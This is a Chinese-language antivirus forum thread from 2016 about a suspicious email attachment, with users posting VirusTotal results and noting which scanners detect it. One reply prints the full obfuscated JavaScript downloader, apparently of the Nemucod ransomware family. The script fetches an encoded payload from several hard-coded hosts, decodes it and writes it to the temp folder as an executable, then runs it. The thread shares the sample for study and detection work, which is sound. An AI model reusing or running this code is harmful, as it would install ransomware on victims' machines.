查看: 6609|回复: 18
收起左侧

[可疑文件] 郵件附件

[复制链接]
P.ter
发表于 2016-6-22 12:39:19 | 显示全部楼层 |阅读模式
今天又收到了一個可疑檔案

BD和Kaspersky miss

Virustotal結果
https://www.virustotal.com/zh-tw ... nalysis/1466570054/

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
蓝天二号
发表于 2016-6-22 12:46:31 | 显示全部楼层
运行 如下。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
轩夏
发表于 2016-6-22 12:54:09 | 显示全部楼层
本帖最后由 轩夏 于 2016-6-22 13:01 编辑

MSE MISS

衍生物如下


代码如下
[mw_shl_code=javascript,true]var MYi6 = "close";
var KHp = "ile";
var LYFi = "veToF";
var Zc5 = "Sa";
function QTu1(Da1) {
    return Da1;
};
var XNHy7 = "Text";
var MWNd4 = "write";
var XBNz1 = "open";
var Tv = "rset";
var MGv4 = "Cha";
var DVLm = "pe";
var DTZSc = "ty";
var Xp2 = "tream";
var BHx6 = "B.S";
var PHw = "OD";
var PYWo8 = "AD";
var JDUAf8 = "bject";
var AFf1 = "teO";
var PSTt = "Crea";
var ASOBm = "join";
var PNz = "e";
var Mg3 = "od";
var LAe = "harC";
var WNJh9 = "fromC";
var ESp2 = "h";
var Ox3 = "lengt";
var FWMl4 = "push";
var ZVUUi = "At";
var UCc8 = "rCode";
var WKLk3 = "cha";
var DSCi9 = "gth";
var RZr3 = "len";
var UEq = "ose";
var BZSm9 = "cl";
var AAFd0 = "ext";
var JHx1 = "ReadT";
var XHc3 = "ile";
var LOFo = "omF";
var XAFQj = "dFr";
var ZXh = "Loa";
var Pn6 = "open";
var YDh1 = "set";
var ZGSv = "Char";
var FYRDb5 = "e";
var VCd = "typ";
var BBJd4 = "eam";
var XLl = "B.Str";
var FEHf = "ADOD";
var PXn = "ct";
var ZNt9 = "bje";
var NABp = "eO";
var FOIVg = "Creat";
var Cb0 = "h";
var DYQj4 = "lengt";
var FVZSq9 = "ngth";
var Jb = "le";
var LWFm = "h";
var Cl = "lengt";
var OLk = "lice";
var TQt = "sp";
var ZNr9 = "ngth";
var XSNe = "le";
var NCBe5 = "h";
var ZLEYb8 = "lengt";
var MHj2 = "ngth";
var RQUk5 = "le";
var Kn = "h";
var It9 = "ngt";
var CCw9 = "le";
var JGEd8 = "Sleep";
function JBRe(LGBk) {
    return LGBk;
};
var Op = "23";
var Ed8 = " 1";
var YOn4 = "Run";
var Gw = "h";
var OOAj = "gt";
var No = "len";
var GRTa = "th";
var SGf4 = "leng";
var ACPm9 = "e";
var BCo0 = "clos";
function FPj(HSz5) {
    return HSz5;
};
function Ac(CFc) {
    return CFc;
};
function Eo0(Mm2) {
    return Mm2;
};
var Wh0 = "e";
var To1 = "Fil";
var OBn = "veTo";
var Av = "Sa";
var LCQs = "n";
var Jx = "io";
var SICe3 = "posit";
var LMXj = "y";
var KBx = "Bod";
var QZQs = "ponse";
var GHz = "Res";
var WLg = "write";
function TIIMb8(DWWr) {
    return DWWr;
};
var Ul7 = "type";
var DIWj = "open";
function AKLt(PAUDt) {
    return PAUDt;
};
var JTw1 = "am";
var SUn = "tre";
var RGAi4 = "DB.S";
var OKNy1 = "ADO";
var XDDBm6 = "ect";
var QTTPk2 = "bj";
var In = "eO";
var JVXt1 = "at";
var FUx7 = "Cre";
var Eo = "eep";
var MZk = "Sl";
var LOa = "send";
var Rh0 = "th";
var YCs8 = "leng";
var Mm8 = "GET";
function Wi(Al3) {
    return Al3;
};
var IARw7 = "en";
var CDd = "op";
function FXi5(Le6) {
    return Le6;
};
var Wz2 = "p";
var SLr4 = "Slee";
var ZTQv5 = "th";
var KBs5 = "leng";
var MSw = "t";
var Iz8 = "jec";
var EVn = "eOb";
var JIr9 = "at";
var LOw = "Cre";
var HUSa0 = "h";
var JQFWu6 = "gt";
var MWDr1 = "len";
var LDBWv8 = "TP";
var Hn1 = "MLHT";
var CLGq7 = "L2.X";
var PFz2 = "MSXM";
function Hu(XYAg5) {
    return XYAg5;
};
function QBa3(Lp) {
    return Lp;
};
var Ej = "5.1";
var NMDf = "st.";
var AJGKb7 = "que";
var YDDNz = "tpRe";
var Ax = "nHt";
var PGTYr8 = "Wi";
var MRe6 = "ttp.";
var SNt = "WinH";
var Mq2 = "xe";
var Nt0 = ".e";
var YTYp = "H5";
var Cx = "kB";
var DPo = "KEs";
var XJCh7 = "E5";
function Er(QPt) {
    return QPt;
};
var QJMHq = "/";
var EPDRu3 = "EMP%";
var Yj3 = "%T";
function GYg1(ATw9) {
    return ATw9;
};
function WUy(Cs) {
    return Cs;
};
var GQXb = "l";
var RGWFj5 = "hel";
var KJTs7 = "t.S";
var XMHUj0 = "rip";
var MEq8 = "WSc";
var KNb = "bject";
var ZWYg8 = "eO";
var ZMw = "Creat";
function YRz5(Sp1) {
    return Sp1;
};
var ZZIs = "8a";
var AKb = "1";
var Kq = "/tt";
var FSVCh = "de";
var MXm = "ung.";
function BGLFl(EZMl) {
    return EZMl;
};
var QBPu = "ch";
var Bm9 = "s";
var Dg2 = "for";
var YSy = "/marx";
var TSJq9 = "/";
var SEFd = "tp:";
var VHGm = "ht";
function Dw(Ik4) {
    return Ik4;
};
var ULAm1 = "8j";
var XFr8 = "t4";
var KISq9 = "id";
var TXFQa1 = "/d";
var Ia6 = "et";
var OPTg4 = "e.n";
var OBMj = "iv";
var CFx5 = "eat";
var Lo3 = "cr";
var MDn = "us";
var QGQg2 = "foc";
var GWt2 = "n";
var NDf = "/i";
var PUc = ":/";
var HQj3 = "p";
var LHo9 = "htt";
function RYBi(JLc7) {
    return JLc7;
};
var RLn = "v";
var Qf = "d";
var Hy = "/69u";
var QJf9 = "com";
var NOd = "o.";
function AZTo3(WMCd) {
    return WMCd;
};
var YDa8 = "wo";
var KIXn = "uhm";
var HACKc4 = "nab";
var SCj = "/vi";
var MWXi7 = "tp:/";
function VAd(QQf3) {
    return QQf3;
};
var VQz = "ht";
var KHQn0 = "437";
var ZMq = "th";
var KUALl = "leng";
function XUYCo(Ka7) {
    return Ka7;
};
var Xl = "s012";
var SDYe = "ys72b";
var Ag = "fd";
var OHAJe = "as";
var LEEXx = "asdf";
var Lb9 = "asf";
var FNl4 = "h";
var Jh3 = "ngt";
var DHTe0 = "le";
var YSv = "fGX1";
var AWIq = "DX";
var Rn = "ivWp";
var COt = "BJO";
var Nc4 = "vXSq";
var JKn = "avsd";
var EKz = "oF";
var KUWn3 = "XV5A6";
function IMNEr(GKu) {
    return GKu;
};
function Dx8(ZBp0) {
    return ZBp0;
};
function VXp2(CCLZh1) {
    return CCLZh1;
};
function Al(WPx5) {
    return WPx5;
};
function DKVLz(TCj) {
    return TCj;
};
function HHILs(OEb) {
    return OEb;
};
function JBTIc(NXp8) {
    return NXp8;
};
var KIs = "h";
var KTp4 = "gt";
var HTOKb = "len";
function VTj(PQg) {
    return PQg;
};
var JPo = "A";
var JYk9 = "AA";
var LBRHp = "AAAA";
var Hn = "AAAI";
var KRy = "AAA";
var RQo = "AAA";
var Qi = "2";
var CFo = "313";
var HCs0 = "112";
var MUj = (HCs0 + (function Oa() {
    return CFo;
} ()) + Qi, RQo + VTj(KRy) + Hn + LBRHp + JYk9 + JPo);
var ORWd = MUj[(function LTOw3() {
    return HTOKb;
} ()) + KTp4 + (function BCOu0() {
    return KIs;
} ())];
var LNXWc7 = (KUWn3 + EKz + (function HOs() {
    return JKn;
} ()) + Nc4 + (function QSZz2() {
    return COt;
} ()) + Rn + AWIq + YSv);
var ZVo6 = LNXWc7[HTOKb + KTp4 + KIs];
var GQJk7 = (Lb9 + LEEXx + OHAJe + Ag, XUYCo(SDYe) + Xl);
var Ca = GQJk7[HTOKb + IMNEr(KTp4) + (function DFr() {
    return KIs;
} ())];
var Ln = 1;
var NIGJh9 = 2;
var BYCq4 = 2;
var UNNx6 = "437";
var UIUr7 = [VQz + (function NEh() {
    return MWXi7;
} ()) + SCj + HACKc4 + KIXn + AZTo3(YDa8) + NOd + QJf9 + Hy + (function LFs() {
    return Qf;
} ()) + RYBi(RLn), LHo9 + HQj3 + PUc + NDf + GWt2 + QGQg2 + MDn + Lo3 + CFx5 + OBMj + OPTg4 + Ia6 + TXFQa1 + KISq9 + Dw(XFr8) + ULAm1, VAd(VQz) + MWXi7 + YSy + Dg2 + Bm9 + BGLFl(QBPu) + (function GJb() {
    return MXm;
} ()) + FSVCh + Kq + AKb + YRz5(ZZIs)];
var EOMy = WScript[ZMw + ZWYg8 + KNb](GYg1(MEq8) + XMHUj0 + KJTs7 + WUy(RGWFj5) + (function Fs() {
    return GQXb;
} ()));
var Ba2 = EOMy.ExpandEnvironmentStrings(Er(Yj3) + EPDRu3 + QJMHq);
var VAu = Ba2 + (function Cj() {
    return XJCh7;
} ()) + DPo + Cx + YTYp;
var BVh9 = VAu + Nt0 + Mq2;
var Ut6 = [Hu(SNt) + MRe6 + PGTYr8 + (function Ck() {
    return Ax;
} ()) + YDDNz + (function Dc() {
    return AJGKb7;
} ()) + NMDf + QBa3(Ej), PFz2 + (function Cn5() {
    return CLGq7;
} ()) + Hn1 + (function DZZw() {
    return LDBWv8;
} ())];
for (var TGTSe = 0; TGTSe < Ut6[HTOKb + (function QTe() {
    return KTp4;
} ()) + Dx8(KIs)]; TGTSe++) {
    try {
        var VFHu = WScript[ZMw + ZWYg8 + (function ZISy1() {
            return KNb;
        } ())](Ut6[TGTSe]);
        break;
    } catch(e) {
        continue;
    }
};
var NIYr = 1 * 1;
var DJHUe9 = 1 * 0;
do {
    try {
        if (1 == NIYr) {
            if (DJHUe9 >= UIUr7[HTOKb + KTp4 + KIs]) {
                DJHUe9 = -5750 + 5750;
                WScript[FXi5(SLr4) + (function FDFi() {
                    return Wz2;
                } ())](1000);
            }
            VFHu[CDd + IARw7]((function WSo5() {
                return Mm8;
            } ()), UIUr7[DJHUe9++%UIUr7[HTOKb + KTp4 + KIs]], false);
            VFHu[LOa]();
        }
        if (VFHu.readystate < 4) {
            WScript[(function YJp() {
                return SLr4;
            } ()) + Wz2](100);
            continue;
        }
        var AXCk = WScript[ZMw + ZWYg8 + KNb]((function EEKb0() {
            return OKNy1;
        } ()) + RGAi4 + SUn + JTw1);
        AXCk[CDd + IARw7]();
        AXCk[Ul7] = Ln;
        AXCk[WLg](VFHu[GHz + QZQs + KBx + LMXj]);
        AXCk[(function Ju7() {
            return SICe3;
        } ()) + Jx + LCQs] = 0;
        AXCk[FPj(Av) + (function Bh9() {
            return OBn;
        } ()) + Ac(To1) + (function MWOn6() {
            return Wh0;
        } ())](VAu, BYCq4);
        AXCk[BCo0 + ACPm9]();
        var Bp = JFSHm(VAu);
        Bp = NWAq5(Bp);
        if (Bp[HTOKb + KTp4 + VXp2(KIs)] < (17 * 8 + 4) * 1024 || Bp[(function FIDJu3() {
            return HTOKb;
        } ()) + KTp4 + KIs] > 150 * 1024 || !TQWGb6(Bp)) {
            NIYr = 1;
            continue;
        }
        try {
            ECz7(BVh9, Bp);
        } catch(e) {
            break;
        };
        EOMy[YOn4](BVh9 + Ed8 + JBRe(Op));
        break;
    } catch(e) {
        WScript[SLr4 + Wz2](1000);
        continue;
    };
} while ( NIYr );
WScript.Quit( - 3454 + 3454);
function NWAq5(TRp5) {
    var PSXCa
    /* L  */
    ;
    var LZMm8 = TRp5[TRp5[(function EFGj1() {
        return HTOKb;
    } ()) + KTp4 + KIs] - 4] | TRp5[TRp5[(function EIKn5() {
        return HTOKb;
    } ()) + KTp4 + KIs] - 3] << 8 | TRp5[TRp5[Al(HTOKb) + KTp4 + DKVLz(KIs)] - 2] << ( - 1178 + 1194) | TRp5[TRp5[(function HXl() {
        return HTOKb;
    } ()) + KTp4 + KIs] - 1] << 24;
    TRp5[TQt + (function ZEMGm3() {
        return OLk;
    } ())](Bp[HTOKb + KTp4 + KIs] - 4, 4);
    PSXCa = ORWd;
    for (var TGTSe = 0; TGTSe < TRp5[HTOKb + KTp4 + HHILs(KIs)]; TGTSe++) {
        PSXCa = (PSXCa
        /* L  */
        + TRp5[TGTSe]) % 0x100000000;
    };
    if (PSXCa
    /* L  */
    != LZMm8) {
        return []
    };
    RQh = ZVo6;
    TRp5 = TRp5.reverse();
    for (var TGTSe = 6450 - 6450; TGTSe < TRp5[JBTIc(HTOKb) + KTp4 + KIs]; TGTSe++) {
        TRp5[TGTSe] ^= RQh;
        RQh = (RQh + Ca) % 256;
    };
    return TRp5;
};
function TQWGb6(TRp5) {
    if (TRp5[0] == 0x4D && TRp5[1] == 0x5a) {
        return true;
    } else {
        return false;
    }
};
function JFSHm(HKAj2) {
    var Ss3 = WScript[(function TGl7() {
        return ZMw;
    } ()) + ZWYg8 + KNb](OKNy1 + RGAi4 + (function Os() {
        return SUn;
    } ()) + JTw1);
    Ss3[Ul7] = NIGJh9;
    Ss3[ZGSv + YDh1] = UNNx6;
    Ss3[CDd + Wi(IARw7)]();
    Ss3[ZXh + (function EHa4() {
        return XAFQj;
    } ()) + LOFo + (function TJSn1() {
        return XHc3;
    } ())](HKAj2);
    var WYAr3 = Ss3[JHx1 + AAFd0];
    Ss3[BCo0 + ACPm9]();
    return Sl1
    /* L  */
    (WYAr3);
};
function Sl1
/* L  */
(ZCLd) {
    var ZUe = new Array();
    ZUe[0xC7] = 0x80;
    ZUe[0xFC] = 0x81;
    ZUe[0xE9] = 0x82;
    ZUe[0xE2] = 0x83;
    ZUe[0xE4] = 0x84;
    ZUe[0xE0] = 0x85;
    ZUe[0xE5] = 0x86;
    ZUe[0xE7] = 0x87;
    ZUe[0xEA] = 0x88;
    ZUe[0xEB] = 0x89;
    ZUe[0xE8] = 0x8A;
    ZUe[0xEF] = 0x8B;
    ZUe[0xEE] = 0x8C;
    ZUe[0xEC] = 0x8D;
    ZUe[0xC4] = 0x8E;
    ZUe[0xC5] = 0x8F;
    ZUe[0xC9] = 0x90;
    ZUe[0xE6] = 0x91;
    ZUe[0xC6] = 0x92;
    ZUe[0xF4] = 0x93;
    ZUe[0xF6] = 0x94;
    ZUe[0xF2] = 0x95;
    ZUe[0xFB] = 0x96;
    ZUe[0xF9] = 0x97;
    ZUe[0xFF] = 0x98;
    ZUe[0xD6] = 0x99;
    ZUe[0xDC] = 0x9A;
    ZUe[0xA2] = 0x9B;
    ZUe[0xA3] = 0x9C;
    ZUe[0xA5] = 0x9D;
    ZUe[0x20A7] = 0x9E;
    ZUe[0x192] = 0x9F;
    ZUe[0xE1] = 0xA0;
    ZUe[0xED] = 0xA1;
    ZUe[0xF3] = 0xA2;
    ZUe[0xFA] = 0xA3;
    ZUe[0xF1] = 0xA4;
    ZUe[0xD1] = 0xA5;
    ZUe[0xAA] = 0xA6;
    ZUe[0xBA] = 0xA7;
    ZUe[0xBF] = 0xA8;
    ZUe[0x2310] = 0xA9;
    ZUe[0xAC] = 0xAA;
    ZUe[0xBD] = 0xAB;
    ZUe[0xBC] = 0xAC;
    ZUe[0xA1] = 0xAD;
    ZUe[0xAB] = 0xAE;
    ZUe[0xBB] = 0xAF;
    ZUe[0x2591] = 0xB0;
    ZUe[0x2592] = 0xB1;
    ZUe[0x2593] = 0xB2;
    ZUe[0x2502] = 0xB3;
    ZUe[0x2524] = 0xB4;
    ZUe[0x2561] = 0xB5;
    ZUe[0x2562] = 0xB6;
    ZUe[0x2556] = 0xB7;
    ZUe[0x2555] = 0xB8;
    ZUe[0x2563] = 0xB9;
    ZUe[0x2551] = 0xBA;
    ZUe[0x2557] = 0xBB;
    ZUe[0x255D] = 0xBC;
    ZUe[0x255C] = 0xBD;
    ZUe[0x255B] = 0xBE;
    ZUe[0x2510] = 0xBF;
    ZUe[0x2514] = 0xC0;
    ZUe[0x2534] = 0xC1;
    ZUe[0x252C] = 0xC2;
    ZUe[0x251C] = 0xC3;
    ZUe[0x2500] = 0xC4;
    ZUe[0x253C] = 0xC5;
    ZUe[0x255E] = 0xC6;
    ZUe[0x255F] = 0xC7;
    ZUe[0x255A] = 0xC8;
    ZUe[0x2554] = 0xC9;
    ZUe[0x2569] = 0xCA;
    ZUe[0x2566] = 0xCB;
    ZUe[0x2560] = 0xCC;
    ZUe[0x2550] = 0xCD;
    ZUe[0x256C] = 0xCE;
    ZUe[0x2567] = 0xCF;
    ZUe[0x2568] = 0xD0;
    ZUe[0x2564] = 0xD1;
    ZUe[0x2565] = 0xD2;
    ZUe[0x2559] = 0xD3;
    ZUe[0x2558] = 0xD4;
    ZUe[0x2552] = 0xD5;
    ZUe[0x2553] = 0xD6;
    ZUe[0x256B] = 0xD7;
    ZUe[0x256A] = 0xD8;
    ZUe[0x2518] = 0xD9;
    ZUe[0x250C] = 0xDA;
    ZUe[0x2588] = 0xDB;
    ZUe[0x2584] = 0xDC;
    ZUe[0x258C] = 0xDD;
    ZUe[0x2590] = 0xDE;
    ZUe[0x2580] = 0xDF;
    ZUe[0x3B1] = 0xE0;
    ZUe[0xDF] = 0xE1;
    ZUe[0x393] = 0xE2;
    ZUe[0x3C0] = 0xE3;
    ZUe[0x3A3] = 0xE4;
    ZUe[0x3C3] = 0xE5;
    ZUe[0xB5] = 0xE6;
    ZUe[0x3C4] = 0xE7;
    ZUe[0x3A6] = 0xE8;
    ZUe[0x398] = 0xE9;
    ZUe[0x3A9] = 0xEA;
    ZUe[0x3B4] = 0xEB;
    ZUe[0x221E] = 0xEC;
    ZUe[0x3C6] = 0xED;
    ZUe[0x3B5] = 0xEE;
    ZUe[0x2229] = 0xEF;
    ZUe[0x2261] = 0xF0;
    ZUe[0xB1] = 0xF1;
    ZUe[0x2265] = 0xF2;
    ZUe[0x2264] = 0xF3;
    ZUe[0x2320] = 0xF4;
    ZUe[0x2321] = 0xF5;
    ZUe[0xF7] = 0xF6;
    ZUe[0x2248] = 0xF7;
    ZUe[0xB0] = 0xF8;
    ZUe[0x2219] = 0xF9;
    ZUe[0xB7] = 0xFA;
    ZUe[0x221A] = 0xFB;
    ZUe[0x207F] = 0xFC;
    ZUe[0xB2] = 0xFD;
    ZUe[0x25A0] = 0xFE;
    ZUe[0xA0] = 0xFF;
    var Bp = new Array();
    for (var TGTSe = 0; TGTSe < ZCLd[HTOKb + KTp4 + KIs]; TGTSe++) {
        var ULQm4 = ZCLd[WKLk3 + (function HIo4() {
            return UCc8;
        } ()) + ZVUUi](TGTSe);
        if (ULQm4 < 128) {
            var HTBb7 = ULQm4;
        } else {
            var HTBb7 = ZUe[ULQm4];
        }
        Bp[FWMl4](HTBb7);
    };
    return Bp;
};
function KGa(TRp5) {
    var WNKh = new Array();
    WNKh[0x80] = 0x00C7;
    WNKh[0x81] = 0x00FC;
    WNKh[0x82] = 0x00E9;
    WNKh[0x83] = 0x00E2;
    WNKh[0x84] = 0x00E4;
    WNKh[0x85] = 0x00E0;
    WNKh[0x86] = 0x00E5;
    WNKh[0x87] = 0x00E7;
    WNKh[0x88] = 0x00EA;
    WNKh[0x89] = 0x00EB;
    WNKh[0x8A] = 0x00E8;
    WNKh[0x8B] = 0x00EF;
    WNKh[0x8C] = 0x00EE;
    WNKh[0x8D] = 0x00EC;
    WNKh[0x8E] = 0x00C4;
    WNKh[0x8F] = 0x00C5;
    WNKh[0x90] = 0x00C9;
    WNKh[0x91] = 0x00E6;
    WNKh[0x92] = 0x00C6;
    WNKh[0x93] = 0x00F4;
    WNKh[0x94] = 0x00F6;
    WNKh[0x95] = 0x00F2;
    WNKh[0x96] = 0x00FB;
    WNKh[0x97] = 0x00F9;
    WNKh[0x98] = 0x00FF;
    WNKh[0x99] = 0x00D6;
    WNKh[0x9A] = 0x00DC;
    WNKh[0x9B] = 0x00A2;
    WNKh[0x9C] = 0x00A3;
    WNKh[0x9D] = 0x00A5;
    WNKh[0x9E] = 0x20A7;
    WNKh[0x9F] = 0x0192;
    WNKh[0xA0] = 0x00E1;
    WNKh[0xA1] = 0x00ED;
    WNKh[0xA2] = 0x00F3;
    WNKh[0xA3] = 0x00FA;
    WNKh[0xA4] = 0x00F1;
    WNKh[0xA5] = 0x00D1;
    WNKh[0xA6] = 0x00AA;
    WNKh[0xA7] = 0x00BA;
    WNKh[0xA8] = 0x00BF;
    WNKh[0xA9] = 0x2310;
    WNKh[0xAA] = 0x00AC;
    WNKh[0xAB] = 0x00BD;
    WNKh[0xAC] = 0x00BC;
    WNKh[0xAD] = 0x00A1;
    WNKh[0xAE] = 0x00AB;
    WNKh[0xAF] = 0x00BB;
    WNKh[0xB0] = 0x2591;
    WNKh[0xB1] = 0x2592;
    WNKh[0xB2] = 0x2593;
    WNKh[0xB3] = 0x2502;
    WNKh[0xB4] = 0x2524;
    WNKh[0xB5] = 0x2561;
    WNKh[0xB6] = 0x2562;
    WNKh[0xB7] = 0x2556;
    WNKh[0xB8] = 0x2555;
    WNKh[0xB9] = 0x2563;
    WNKh[0xBA] = 0x2551;
    WNKh[0xBB] = 0x2557;
    WNKh[0xBC] = 0x255D;
    WNKh[0xBD] = 0x255C;
    WNKh[0xBE] = 0x255B;
    WNKh[0xBF] = 0x2510;
    WNKh[0xC0] = 0x2514;
    WNKh[0xC1] = 0x2534;
    WNKh[0xC2] = 0x252C;
    WNKh[0xC3] = 0x251C;
    WNKh[0xC4] = 0x2500;
    WNKh[0xC5] = 0x253C;
    WNKh[0xC6] = 0x255E;
    WNKh[0xC7] = 0x255F;
    WNKh[0xC8] = 0x255A;
    WNKh[0xC9] = 0x2554;
    WNKh[0xCA] = 0x2569;
    WNKh[0xCB] = 0x2566;
    WNKh[0xCC] = 0x2560;
    WNKh[0xCD] = 0x2550;
    WNKh[0xCE] = 0x256C;
    WNKh[0xCF] = 0x2567;
    WNKh[0xD0] = 0x2568;
    WNKh[0xD1] = 0x2564;
    WNKh[0xD2] = 0x2565;
    WNKh[0xD3] = 0x2559;
    WNKh[0xD4] = 0x2558;
    WNKh[0xD5] = 0x2552;
    WNKh[0xD6] = 0x2553;
    WNKh[0xD7] = 0x256B;
    WNKh[0xD8] = 0x256A;
    WNKh[0xD9] = 0x2518;
    WNKh[0xDA] = 0x250C;
    WNKh[0xDB] = 0x2588;
    WNKh[0xDC] = 0x2584;
    WNKh[0xDD] = 0x258C;
    WNKh[0xDE] = 0x2590;
    WNKh[0xDF] = 0x2580;
    WNKh[0xE0] = 0x03B1;
    WNKh[0xE1] = 0x00DF;
    WNKh[0xE2] = 0x0393;
    WNKh[0xE3] = 0x03C0;
    WNKh[0xE4] = 0x03A3;
    WNKh[0xE5] = 0x03C3;
    WNKh[0xE6] = 0x00B5;
    WNKh[0xE7] = 0x03C4;
    WNKh[0xE8] = 0x03A6;
    WNKh[0xE9] = 0x0398;
    WNKh[0xEA] = 0x03A9;
    WNKh[0xEB] = 0x03B4;
    WNKh[0xEC] = 0x221E;
    WNKh[0xED] = 0x03C6;
    WNKh[0xEE] = 0x03B5;
    WNKh[0xEF] = 0x2229;
    WNKh[0xF0] = 0x2261;
    WNKh[0xF1] = 0x00B1;
    WNKh[0xF2] = 0x2265;
    WNKh[0xF3] = 0x2264;
    WNKh[0xF4] = 0x2320;
    WNKh[0xF5] = 0x2321;
    WNKh[0xF6] = 0x00F7;
    WNKh[0xF7] = 0x2248;
    WNKh[0xF8] = 0x00B0;
    WNKh[0xF9] = 0x2219;
    WNKh[0xFA] = 0x00B7;
    WNKh[0xFB] = 0x221A;
    WNKh[0xFC] = 0x207F;
    WNKh[0xFD] = 0x00B2;
    WNKh[0xFE] = 0x25A0;
    WNKh[0xFF] = 0x00A0;
    var RLWv = new Array();
    var Qq1 = "";
    var HTBb7;
    var ULQm4;
    for (var TGTSe = 0; TGTSe < TRp5[HTOKb + KTp4 + (function OBd() {
        return KIs;
    } ())]; TGTSe++) {
        HTBb7 = TRp5[TGTSe];
        if (HTBb7 < 128) {
            ULQm4 = HTBb7;
        } else {
            ULQm4 = WNKh[HTBb7];
        }
        RLWv.push(String[WNJh9 + LAe + Mg3 + PNz](ULQm4));
    }
    Qq1 = RLWv[(function QWGq() {
        return ASOBm;
    } ())]("");
    return Qq1;
};
function ECz7(HKAj2, TRp5) {
    var Ss3 = WScript[ZMw + ZWYg8 + (function BZh() {
        return KNb;
    } ())](OKNy1 + RGAi4 + AKLt(SUn) + JTw1);
    Ss3[TIIMb8(Ul7)] = NIGJh9;
    Ss3[ZGSv + YDh1] = UNNx6;
    Ss3[CDd + IARw7]();
    Ss3[QTu1(MWNd4) + XNHy7](KGa(TRp5));
    Ss3[Av + Eo0(OBn) + To1 + Wh0](HKAj2, 2);
    Ss3[BCo0 + ACPm9]();
};[/mw_shl_code]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
猥琐大叔
发表于 2016-6-22 12:57:13 | 显示全部楼层
avast 扫描miss 双击一顿报
vm001
发表于 2016-6-22 13:05:46 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
saga3721
发表于 2016-6-22 13:26:30 | 显示全部楼层
红伞杀'JS/Nemucod.aipfva [virus]'
諾言敵不過時間
发表于 2016-6-22 13:28:22 | 显示全部楼层
豆豆殺衍生物

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
900703
发表于 2016-6-22 13:38:52 | 显示全部楼层
這個樣本是勒索病毒
pal家族
发表于 2016-6-22 17:08:11 | 显示全部楼层
卡巴斯基安全软件
拒绝访问
无法访问该网页

对象网址:

https://att.kafan.cn/forum.php?mo ... Dk3NTc3MnwyMDQ1NjQz

原因:

对象感染源 Trojan.JS.Agent.dho
消息生成日期: 2016/6/22 17:08:07
心醉咖啡
发表于 2016-6-22 17:44:09 | 显示全部楼层
js火绒猎豹miss,衍生物二者均kill
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 21:35 , Processed in 0.133447 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表